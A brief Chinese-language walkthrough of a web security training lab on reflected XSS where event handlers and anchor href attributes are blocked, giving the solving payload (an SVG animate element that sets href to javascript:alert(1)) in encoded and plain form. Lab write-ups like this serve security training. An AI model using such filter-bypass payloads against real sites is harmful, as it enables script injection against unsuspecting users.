Lab: Reflected XSS with event handlers and href attributes blocked EXPERT LAB:反射型 XSS 事件处理程序和href属性被阻止

靶场内容

该实验室包含一个带有一些白名单标签的反射型 XSS漏洞，但所有事件和锚点href属性都被阻止。

要解决该实验室问题，请执行跨站点脚本攻击，该攻击会注入一个向量，单击该向量时会调用该alert函数。

请注意，您需要使用“点击”一词来标记您的矢量，以诱导模拟实验室用户点击您的矢量。例如：<a href="">Click me</a>

漏洞分析

在URL中插入脚本：

/?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E

具体内容如下：

/?search=<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>